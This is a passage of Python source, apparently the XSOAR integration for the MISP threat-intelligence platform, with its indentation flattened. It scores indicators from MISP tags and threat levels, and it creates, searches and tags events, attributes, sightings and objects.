response (dict): The parsed outputs to context data (array of attributes).
score: the indicator score
found_tag: the tag (id) which made the indicator to get that score
found_related_events (dict): contains info (name, id, threat level id) about all the events that include
the indicator
Please see an example for a response in test_data/reputation_command_response.json
Please see an example for a parsed output in test_data/reputation_command_outputs.json
"""
response = copy.deepcopy(misp_response)
attributes_list = response.get('Attribute')
if not attributes_list:
return None
attributes_list = sorted(attributes_list,
key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit]
found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list)
attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events)
score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids,
malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids,
is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level)
formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list})
return formatted_response, score, found_tag, found_related_events
def prepare_attributes_array_to_context_data(attributes_list):
attributes_tag_ids, event_tag_ids = set(), set()
found_related_events = {}
if not attributes_list:
return None
for attribute in attributes_list:
attribute.pop("RelatedAttribute") # get rid of this useless list
event = attribute.get('Event')
convert_timestamp_to_readable(attribute, event)
found_related_events[event.get("id")] = {"Event Name": event.get("info"),
"Threat Level ID": event.get('threat_level_id'),
"Event ID": event.get("id")}
if event.get('Tag'):
limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True)
event['Tag'] = limit_tag_output
event_tag_ids.update(tag_ids)
if attribute.get('Tag'):
limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False)
attribute['Tag'] = limit_tag_output
attributes_tag_ids.update(tag_ids)
return found_related_events, attributes_tag_ids, event_tag_ids
def convert_timestamp_to_readable(attribute, event):
if attribute.get('timestamp'):
attribute['timestamp'] = misp_convert_timestamp_to_date_string(attribute.get('timestamp'))
if event:
if event.get('timestamp'):
attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp'))
if event.get('publish_timestamp'):
attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string(
event.get('publish_timestamp'))
def found_event_with_bad_threat_level_id(found_related_events):
bad_threat_level_ids = ["1", "2", "3"]
for event in found_related_events.values():
if event['Threat Level ID'] in bad_threat_level_ids:
return True
return False
def get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids,
is_attribute_in_event_with_bad_threat_level):
"""
    Calculates the indicator score by the following logic. Indicators of attributes and events that:
    * have tags which are configured as malicious will be scored 3 (i.e. malicious).
    * have tags which are configured as suspicious will be scored 2 (i.e. suspicious).
    * don't have any tags configured as suspicious or malicious will be scored by their event's threat level id. In
    such a case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown.
note:
- In case the same tag appears in both Malicious tag ids and Suspicious tag ids lists the indicator will
be scored as malicious.
- Attributes tags (both malicious and suspicious) are stronger than events' tags.
"""
found_tag = None
is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids)
if is_attribute_tag_malicious:
return Common.DBotScore.BAD, found_tag
is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids)
if is_attribute_tag_suspicious:
return Common.DBotScore.SUSPICIOUS, found_tag
is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids)
if is_event_tag_malicious:
return Common.DBotScore.BAD, found_tag
is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids)
if is_event_tag_suspicious:
return Common.DBotScore.SUSPICIOUS, found_tag
# no tag was found
if is_attribute_in_event_with_bad_threat_level:
return Common.DBotScore.BAD, None
return Common.DBotScore.NONE, None
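# Illustrative example (not from the original source) of the precedence described
# above: with malicious_tag_ids={'1'}, suspicious_tag_ids={'2'},
# attribute_tags_ids={'2'} and event_tags_ids={'1'}, the attribute-level suspicious
# tag wins and get_score returns (Common.DBotScore.SUSPICIOUS, '2'), even though an
# event-level malicious tag is also present.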
def get_new_misp_event_object(args):
"""
Create a new MISP event object and set the event's details.
"""
event = MISPEvent()
event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')]
threat_level_id_arg = args.get('threat_level_id')
if threat_level_id_arg:
event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg]
analysis_arg = args.get('analysis')
event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg
event.info = args.get('info') if args.get('info') else 'Event from XSOAR'
event.date = datetime.today()
event.published = argToBoolean(args.get('published', 'False'))
return event
def create_event_command(demisto_args: dict):
"""Creating event in MISP with the given attribute args"""
new_event = get_new_misp_event_object(demisto_args)
new_event = PYMISP.add_event(new_event, True)
if isinstance(new_event, dict) and new_event.get('errors'):
raise DemistoException(new_event.get('errors'))
event_id = new_event.id
add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args)
event = PYMISP.search(eventid=event_id)
human_readable = f"## MISP create event\nNew event with ID: {event_id} has been successfully created.\n"
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(event),
raw_response=event
)
def add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None):
"""Adding attribute to a given MISP event object
    This function can be called as an independent command or as part of another command (create event for example)
Args:
event_id (int): Event ID to add attribute to
internal (bool): if set to True, will not post results to Demisto
demisto_args (dict): Demisto args
        new_event (MISPEvent): When this function was called from create event command, the attribute will be added to
that existing event.
"""
attributes_args = {
'id': demisto_args.get('event_id'), # misp event id
'type': demisto_args.get('type', 'other'),
'category': demisto_args.get('category', 'External analysis'),
'to_ids': argToBoolean(demisto_args.get('to_ids', True)),
'comment': demisto_args.get('comment'),
'value': demisto_args.get('value')
}
event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), "event_id")
attributes_args.update({'id': event_id}) if event_id else None
distribution = demisto_args.get('distribution')
attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None
if not new_event:
response = PYMISP.search(eventid=event_id, pythonify=True)
if not response:
raise DemistoException(
f"Error: An event with the given id: {event_id} was not found in MISP. please check it once again")
new_event = response[0] # response[0] is MISP event
new_event.add_attribute(**attributes_args)
PYMISP.update_event(event=new_event)
if internal:
return
value = attributes_args.get('value')
updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value)
human_readable = f"## MISP add attribute\nNew attribute: {value} was added to event id {new_event.id}.\n"
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(updated_event),
raw_response=updated_event
)
def generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit):
reputation_value_list = argToList(demisto_args.get(reputation_type), ',')
command_results = []
for value in reputation_value_list:
command_results.append(
get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
return command_results
def reputation_value_validation(value, dbot_type):
if dbot_type == 'FILE':
# hashFormat will be used only in output
hash_format = get_hash_type(value)
if hash_format == 'Unknown':
raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256')
if dbot_type == 'IP':
if not is_ip_valid(value):
raise DemistoException(f"Error: The given IP address: {value} is not valid")
if dbot_type == 'DOMAIN':
if not re.compile(DOMAIN_REGEX, regexFlags).match(value):
raise DemistoException(f"Error: The given domain: {value} is not valid")
if dbot_type == 'URL':
if not re.compile(urlRegex, regexFlags).match(value):
raise DemistoException(f"Error: The given url: {value} is not valid")
if dbot_type == 'EMAIL':
if not re.compile(emailRegex, regexFlags).match(value):
raise DemistoException(f"Error: The given email address: {value} is not valid")
def get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit):
"""
    This function searches for the given attribute value in MISP and then calculates its dbot score.
    The score is calculated by the tag ids (attribute tags and event tags).
Args:
value (str): The indicator value (an IP address, email address, domain, url or file hash).
dbot_type (str): Indicator type (file, url, domain, email or ip).
        malicious_tag_ids (set): Tag ids that should be recognised as malicious.
        suspicious_tag_ids (set): Tag ids that should be recognised as suspicious.
reliability (DBotScoreReliability): integration reliability score.
attributes_limit (int) : Limits the number of attributes that will be written to the context
Returns:
CommandResults includes all the indicator results.
"""
reputation_value_validation(value, dbot_type)
misp_response = PYMISP.search(value=value, controller='attributes', include_context=True,
include_correlations=True, include_event_tags=True, enforce_warninglist=True,
include_decay_score=True, includeSightings=True)
indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type]
is_indicator_found = misp_response and misp_response.get('Attribute')
if is_indicator_found:
outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response,
malicious_tag_ids,
suspicious_tag_ids,
attributes_limit)
dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,
score=score, reliability=reliability, malicious_description="Match found in MISP")
indicator = get_dbot_indicator(dbot_type, dbot, value)
all_attributes = outputs.get('Attribute')
events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag)
attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable)
readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights,
removeNull=True)
readable_output += tableToMarkdown('Related events', list(found_related_events.values()))
return CommandResults(indicator=indicator,
raw_response=misp_response,
outputs=all_attributes,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
readable_output=readable_output)
else:
dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,
score=Common.DBotScore.NONE, reliability=reliability,
malicious_description="No results were found in MISP")
indicator = get_dbot_indicator(dbot_type, dbot, value)
return CommandResults(indicator=indicator,
readable_output=f"No attributes found in MISP for value: {value}")
def get_events_related_to_scored_tag(all_attributes, found_tag):
"""
    This function searches for all the events that have the tag (i.e. found_tag) which caused the indicator to be scored
as malicious or suspicious.
Args:
all_attributes (dict): The parsed response from the MISP search attribute request
found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is
Unknown so no events should be found.
Returns:
list includes all the events that were detected as related to the tag.
"""
scored_events = []
if found_tag:
for attribute in all_attributes:
event = attribute.get('Event', {})
event_name = event.get('Info')
scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name))
scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name))
return remove_duplicated_related_events(scored_events)
def remove_duplicated_related_events(related_events):
related_events_no_duplicates = []
for i in range(len(related_events)):
if related_events[i] not in related_events[i + 1:]:
related_events_no_duplicates.append(related_events[i])
return related_events_no_duplicates
def search_events_with_scored_tag(object_data_dict, found_tag, event_name):
"""
    For the given object, we go over all the tags and check whether found_tag is one of its tags. If so, the event will be
    added to the related_events list.
Args:
object_data_dict (dict): Event or attribute dict which includes tags list.
found_tag (str): The tag that was scored as malicious or suspicious.
event_name (str): Name of the event
"""
related_events = []
object_tags_list = object_data_dict.get('Tag', [])
for tag in object_tags_list:
if tag.get('ID') == found_tag:
event_id = get_event_id(object_data_dict)
tag_name = tag.get('Name')
related_events.append({'Event_ID': event_id, 'Event_Name': event_name,
'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')})
return related_events
def get_event_id(data_dict):
if data_dict.get('EventID'):
return data_dict.get('EventID')
elif data_dict.get('ID'):
return data_dict.get('ID')
return data_dict.get('Event', {}).get('ID')
def get_dbot_indicator(dbot_type, dbot_score, value):
if dbot_type == "FILE":
hash_type = get_hash_type(value)
if hash_type == 'md5':
return Common.File(dbot_score=dbot_score, md5=value)
if hash_type == 'sha1':
return Common.File(dbot_score=dbot_score, sha1=value)
if hash_type == 'sha256':
return Common.File(dbot_score=dbot_score, sha256=value)
if dbot_type == "IP":
return Common.IP(ip=value, dbot_score=dbot_score)
if dbot_type == "DOMAIN":
return Common.Domain(domain=value, dbot_score=dbot_score)
if dbot_type == "EMAIL":
return Common.EMAIL(address=value, dbot_score=dbot_score)
if dbot_type == "URL":
return Common.URL(url=value, dbot_score=dbot_score)
def build_misp_complex_filter(demisto_query: str):
"""
Examples are available in UT: test_build_misp_complex_filter.
For more information please see build_complex_query in pymisp/api.py
Args:
        demisto_query: complex query containing the reserved words: 'AND:', 'OR:' and 'NOT:'
using ',' as delimiter for parameters and ';' as delimiter for operators.
using the operators is optional.
        if 'demisto_query' does not contain any of the complex operators the original
input will be returned
Returns:
str: dictionary created for misp to perform complex query
or if no complex query found returns the original input
"""
regex_and = r'(AND:)([^\;]+)(;)?'
regex_or = r'(OR:)([^\;]+)(;)?'
regex_not = r'(NOT:)([^\;]+)(;)?'
misp_query_params = dict()
match_and = re.search(regex_and, demisto_query, re.MULTILINE)
match_or = re.search(regex_or, demisto_query, re.MULTILINE)
match_not = re.search(regex_not, demisto_query, re.MULTILINE)
is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters')
is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters')
is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters')
is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator
if is_complex_search:
return PYMISP.build_complex_query(**misp_query_params)
return demisto_query
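# Illustrative example (not from the original source): a demisto_query such as
#   'AND:tag1,tag2;NOT:tag3'
# is parsed into {'and_parameters': ['tag1', 'tag2'], 'not_parameters': ['tag3']}
# and handed to PYMISP.build_complex_query, while a plain query like 'tag1' is
# returned unchanged.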
def is_misp_complex_search_helper(match_operator, misp_query_params, operator_key):
is_complex_search = False
if match_operator is not None:
misp_query_params[operator_key] = match_operator.group(2).split(',')
is_complex_search = True
return is_complex_search
def prepare_args_to_search(controller):
demisto_args = demisto.args()
args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args}
# Replacing keys and values from Demisto to Misp's keys
if 'type' in args_to_misp_format:
args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type')
if 'to_ids' in args_to_misp_format:
args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0
if 'from' in args_to_misp_format:
args_to_misp_format['date_from'] = args_to_misp_format.pop('from')
if 'to' in args_to_misp_format:
args_to_misp_format['date_to'] = args_to_misp_format.pop('to')
if 'event_id' in args_to_misp_format:
args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id'))
if 'last' in args_to_misp_format:
args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last')
if 'include_decay_score' in args_to_misp_format:
args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0
if 'include_sightings' in args_to_misp_format:
args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0
if 'include_correlations' in args_to_misp_format:
args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0
if 'enforceWarninglist' in args_to_misp_format:
args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0
if 'include_feed_correlations' in args_to_misp_format:
args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get(
'include_feed_correlations') == 'true' else 0
args_to_misp_format.pop('include_feed_correlations')
if 'limit' not in args_to_misp_format:
args_to_misp_format['limit'] = '50'
if 'tags' in args_to_misp_format:
args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags'])
args_to_misp_format['controller'] = controller
demisto.debug(f"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}")
return args_to_misp_format
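# Illustrative example (not from the original source): demisto args such as
#   {'type': 'ip-src', 'to_ids': 'true', 'from': '2021-01-01'}
# would be translated here (for controller='attributes') into
#   {'type_attribute': 'ip-src', 'to_ids': 1, 'date_from': '2021-01-01',
#    'limit': '50', 'controller': 'attributes'}
# before being passed to PYMISP.search.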
def build_attributes_search_response(response: Union[dict, requests.Response],
include_correlations=False) -> dict:
"""
Convert the response of attribute search returned from MISP to the context output format.
"""
response_object = copy.deepcopy(response)
if include_correlations:
# return full related attributes only if the user wants to get them back
ATTRIBUTE_FIELDS.append('RelatedAttribute')
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
attributes = response_object.get('Attribute')
return get_limit_attribute_search_outputs(attributes)
def get_limit_attribute_search_outputs(attributes):
for i in range(len(attributes)):
attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]}
build_galaxy_output(attributes[i])
build_tag_output(attributes[i])
build_sighting_output_from_attribute_search_response(attributes[i])
convert_timestamp_to_readable(attributes[i], None)
formatted_attributes = replace_keys_from_misp_to_context_data(attributes)
return formatted_attributes
def build_galaxy_output(given_object):
"""given_object is attribute or event, depends on the called function"""
if given_object.get('Galaxy'):
given_object['Galaxy'] = [
{
'name': star.get('name'),
'type': star.get('type'),
'description': star.get('description')
} for star in given_object['Galaxy']
]
def build_object_output(event):
if event.get('Object'):
event['Object'] = [
{
'name': event_object.get('name'),
'uuid': event_object.get('uuid'),
'description': event_object.get('description'),
'id': event_object.get('id')
} for event_object in event['Object']
]
def build_tag_output(given_object):
"""given_object is attribute or event, depends on the called function"""
if given_object.get('Tag'):
given_object['Tag'] = [
{'Name': tag.get('name'),
'is_galaxy': tag.get('is_galaxy')
} for tag in given_object.get('Tag')
]
def build_sighting_output_from_attribute_search_response(attribute):
if attribute.get('Sighting'):
attribute['Sighting'] = [
{'type': sighting.get('type')
} for sighting in attribute.get('Sighting')
]
def build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list:
"""returns list of attributes' values that match the search query when user set the arg 'compact' to True"""
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
attributes = response_object.get('Attribute')
return [attribute.get('value') for attribute in attributes]
def pagination_args_validation(page, limit):
if page and page < 0:
raise DemistoException("page should be zero or a positive number")
if limit and limit < 0:
raise DemistoException("limit should be zero or a positive number")
def attribute_response_to_markdown_table(response: dict):
attribute_highlights = []
for attribute in response:
event = attribute.get('Event', {})
attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get(
'Tag') else None
attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in
attribute.get('Sighting')] if attribute.get('Sighting') else None
attribute_highlights.append({
'Attribute ID': attribute.get('ID'),
'Event ID': attribute.get('EventID'),
'Attribute Category': attribute.get('Category'),
'Attribute Type': attribute.get('Type'),
'Attribute Comment': attribute.get('Comment'),
'Attribute Value': attribute.get('Value'),
'Attribute Tags': attribute_tags,
'Attribute Sightings': attribute_sightings,
'To IDs': attribute.get('ToIDs'),
'Timestamp': attribute.get('Timestamp'),
'Event Info': event.get('Info'),
'Event Organization ID': event.get('OrganizationID'),
'Event Distribution': event.get('Distribution'),
'Event UUID': event.get('UUID')
})
return attribute_highlights
def search_attributes(demisto_args: dict) -> CommandResults:
"""Execute a MISP search over 'attributes'"""
args = prepare_args_to_search('attributes')
outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False))
include_correlations = argToBoolean(demisto_args.get('include_correlations', False))
page = arg_to_number(demisto_args.get('page', 1), "page", required=True)
limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True)
pagination_args_validation(page, limit)
response = PYMISP.search(**args)
if response:
if outputs_should_include_only_values:
response_for_context = build_attributes_search_response_return_only_values(response)
number_of_results = len(response_for_context)
md = tableToMarkdown(f"MISP search-attributes returned {number_of_results} attributes",
response_for_context[:number_of_results], ["Value"])
else:
response_for_context = build_attributes_search_response(response, include_correlations)
attribute_highlights = attribute_response_to_markdown_table(response_for_context)
pagination_message = f"Current page size: {limit}\n"
if len(response_for_context) == limit:
pagination_message += f"Showing page {page} out others that may exist"
else:
pagination_message += f"Showing page {page}"
md = tableToMarkdown(
f"MISP search-attributes returned {len(response_for_context)} attributes\n {pagination_message}",
attribute_highlights, removeNull=True)
return CommandResults(
raw_response=response,
readable_output=md,
outputs=response_for_context,
outputs_prefix="MISP.Attribute",
outputs_key_field="ID"
)
else:
return CommandResults(readable_output=f"No attributes found in MISP for the given filters: {args}")
def build_events_search_response(response: Union[dict, requests.Response]) -> dict:
"""
Convert the response of event search returned from MISP to the context output format.
please note: attributes are excluded from search-events output as the information is too big. User can use the
command search-attributes in order to get the information about the attributes.
"""
response_object = copy.deepcopy(response)
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
events = [event.get('Event') for event in response_object]
for i in range(0, len(events)):
# Filter object from keys in event_args
events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]}
events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event
build_galaxy_output(events[i])
build_tag_output(events[i])
build_object_output(events[i])
events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp'))
events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp'))
formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore
return formatted_events # type: ignore
def event_to_human_readable_tag_list(event):
event_tags = event.get('Tag', [])
if event_tags:
return [tag.get('Name') for tag in event_tags]
def event_to_human_readable_galaxy_list(event):
event_galaxies = event.get('Galaxy', [])
if event_galaxies:
return [galaxy.get('Name') for galaxy in event.get('Galaxy')]
def event_to_human_readable_object_list(event):
event_objects = event.get('Object', [])
if event_objects:
return [event_object.get('ID') for event_object in event.get('Object')]
def event_to_human_readable(response: dict):
event_highlights = []
for event in response:
event_tags = event_to_human_readable_tag_list(event)
event_galaxies = event_to_human_readable_galaxy_list(event)
event_objects = event_to_human_readable_object_list(event)
event_highlights.append({
'Event ID': event.get('ID'),
'Event Tags': event_tags,
'Event Galaxies': event_galaxies,
'Event Objects': event_objects,
'Publish Timestamp': event.get('PublishTimestamp'),
'Event Info': event.get('Info'),
'Event Org ID': event.get('OrganizationID'),
'Event Orgc ID': event.get('OwnerOrganization.ID'),
'Event Distribution': event.get('Distribution'),
'Event UUID': event.get('UUID'),
})
return event_highlights
def search_events(demisto_args: dict) -> CommandResults:
"""
Execute a MISP search using the 'event' controller.
"""
args = prepare_args_to_search('events')
page = arg_to_number(demisto_args.get('page', 1), "page", required=True)
limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True)
pagination_args_validation(page, limit)
response = PYMISP.search(**args)
if response:
response_for_context = build_events_search_response(response)
event_outputs_to_human_readable = event_to_human_readable(response_for_context)
pagination_message = f"Current page size: {limit}\n"
if len(response_for_context) == limit:
pagination_message += f"Showing page {page} out others that may exist"
else:
pagination_message += f"Showing page {page}"
md = tableToMarkdown(
f"MISP search-events returned {len(response_for_context)} events.\n {pagination_message}",
event_outputs_to_human_readable, removeNull=True)
return CommandResults(
raw_response=response,
readable_output=md,
outputs=response_for_context,
outputs_prefix="MISP.Event",
outputs_key_field="ID"
)
else:
return CommandResults(readable_output=f"No events found in MISP for the given filters: {args}")
def delete_event(demisto_args: dict):
"""
Gets an event id and deletes it.
"""
event_id = demisto_args.get('event_id')
response = PYMISP.delete_event(event_id)
if 'errors' in response:
        raise DemistoException(f'Event ID: {event_id} was not found in MISP: \nError message: {response}')
else:
human_readable = f'Event {event_id} has been deleted'
return CommandResults(readable_output=human_readable, raw_response=response)
def add_tag(demisto_args: dict, is_attribute=False):
"""
Function will add tag to given UUID of event or attribute.
is_attribute (bool): if the given UUID belongs to an attribute (True) or event (False).
"""
uuid = demisto_args.get('uuid')
tag = demisto_args.get('tag')
try:
PYMISP.tag(uuid, tag) # add the tag
except PyMISPError:
raise DemistoException("Adding the required tag was failed. Please make sure the UUID exists.")
if is_attribute:
response = PYMISP.search(uuid=uuid, controller='attributes')
human_readable = f'Tag {tag} has been successfully added to attribute {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(response),
raw_response=response
)
# event's uuid
response = PYMISP.search(uuid=uuid)
human_readable = f'Tag {tag} has been successfully added to event {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(response),
raw_response=response
)
def remove_tag(demisto_args: dict, is_attribute=False):
"""
    Function will remove a tag from the given UUID of an event or attribute.
    is_attribute (bool): True if the given UUID belongs to an attribute, False if it belongs to an event.
"""
uuid = demisto_args.get('uuid')
tag = demisto_args.get('tag')
try:
response = PYMISP.untag(uuid, tag)
if response and response.get('errors'):
raise DemistoException(f'Error in `{demisto.command()}` command: {response}')
except PyMISPError:
raise DemistoException("Removing the required tag was failed. Please make sure the UUID and tag exist.")
if is_attribute:
response = PYMISP.search(uuid=uuid, controller='attributes')
human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(response),
raw_response=response
)
# event's uuid
response = PYMISP.search(uuid=uuid)
human_readable = f'Tag {tag} has been successfully removed from the event {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(response),
raw_response=response
)
def add_sighting(demisto_args: dict):
"""Adds sighting to MISP attribute
"""
attribute_id = demisto_args.get('id')
attribute_uuid = demisto_args.get('uuid')
sighting_type = demisto_args['type'] # mandatory arg
att_id = attribute_id or attribute_uuid
if not att_id:
raise DemistoException('ID or UUID not specified')
sighting_args = {
'id': attribute_id,
'uuid': attribute_uuid,
'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type]
}
sigh_obj = MISPSighting()
sigh_obj.from_dict(**sighting_args)
response = PYMISP.add_sighting(sigh_obj, att_id)
if response.get('message'):
raise DemistoException(f"An error was occurred: {response.get('message')}")
elif response.get('Sighting'):
human_readable = f'Sighting \'{sighting_type}\' has been successfully added to attribute {att_id}'
return CommandResults(readable_output=human_readable)
raise DemistoException(f"An error was occurred: {json.dumps(response)}")
def test(malicious_tag_ids, suspicious_tag_ids, attributes_limit):
"""
Test module.
"""
is_tag_list_valid(malicious_tag_ids)
is_tag_list_valid(suspicious_tag_ids)
if attributes_limit < 0:
raise DemistoException('Attribute limit has to be a positive number.')
response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json')
if PYMISP._check_json_response(response):
return 'ok'
else:
        raise DemistoException('Could not connect to MISP.')
def build_feed_url(demisto_args):
url = demisto_args.get('feed')
url = url[:-1] if url.endswith('/') else url
if PREDEFINED_FEEDS.get(url):
url = PREDEFINED_FEEDS[url].get('url') # type: ignore
return url
def add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict):
"""Gets an OSINT feed from url and publishing them to MISP
urls with feeds for example: https://www.misp-project.org/feeds/
feed format must be MISP.
"""
headers = {'Accept': 'application/json'}
url = build_feed_url(demisto_args)
osint_url = f'{url}/manifest.json'
limit = arg_to_number(demisto_args.get('limit', 2), "limit", required=True)
try:
uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json()
events_ids = list() # type: List[Dict[str, int]]
for index, uri in enumerate(uri_list, 1):
response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json()
misp_new_event = MISPEvent()
misp_new_event.load(response)
add_event_response = PYMISP.add_event(misp_new_event)
event_object = add_event_response.get('Event')
if event_object and 'id' in event_object:
events_ids.append({'ID': event_object['id']})
if limit == len(events_ids):
break
human_readable = tableToMarkdown(f'Total of {len(events_ids)} events was added to MISP.', events_ids)
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=events_ids,
)
except ValueError as e:
raise DemistoException(f'URL [{url}] is not a valid MISP feed. error: {e}')
def add_object(event_id: str, obj: MISPObject):
"""Sending object to MISP and returning outputs
Args:
obj: object to add to MISP
event_id: ID of event
"""
response = PYMISP.add_object(event_id, misp_object=obj)
if 'errors' in response:
raise DemistoException(f'Error in `{demisto.command()}` command: {response}')
for ref in obj.ObjectReference:
response = PYMISP.add_object_reference(ref)
for attribute in response.get('Object', {}).get('Attribute', []):
convert_timestamp_to_readable(attribute, None)
response['Object']['timestamp'] = misp_convert_timestamp_to_date_string(response.get('Object', {}).get('timestamp'))
formatted_response = replace_keys_from_misp_to_context_data(response)
formatted_response.update({"ID": event_id})
human_readable = f'Object has been added to MISP event ID {event_id}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=formatted_response,
)
def add_file_object(demisto_args: dict):
entry_id = demisto_args.get('entry_id')
event_id = demisto_args.get('event_id')
file_path = demisto.getFilePath(entry_id).get('path')
obj = FileObject(file_path)
return add_object(event_id, obj)
def add_domain_object(demisto_args: dict):
"""Adds a domain object to MISP
domain-ip description: https://www.misp-project.org/objects.html#_domain_ip
"""
text = demisto_args.get('text')
event_id = demisto_args.get('event_id')
domain = demisto_args.get('name')
obj = MISPObject('domain-ip')
ips = argToList(demisto_args.get('ip'))
for ip in ips:
obj.add_attribute('ip', value=ip)
obj.add_attribute('domain', value=domain)
if text:
obj.add_attribute('text', value=text)
return add_object(event_id, obj)
def add_url_object(demisto_args: dict):
"""Building url object in MISP scheme
Scheme described https://www.misp-project.org/objects.html#_url
"""
url_args = [
'text',
'last_seen',
'first_seen'
]
event_id = demisto_args.get('event_id')
url = demisto_args.get('url')
url_parse = urlparse(url)
url_obj = [{'url': url}]
    url_obj.append({'scheme': url_parse.scheme}) if url_parse.scheme else None
url_obj.append({'resource_path': url_parse.path}) if url_parse.path else None
url_obj.append({'query_string': url_parse.query}) if url_parse.query else None
url_obj.append({'domain': url_parse.netloc}) if url_parse.netloc else None
url_obj.append({'fragment': url_parse.fragment}) if url_parse.fragment else None
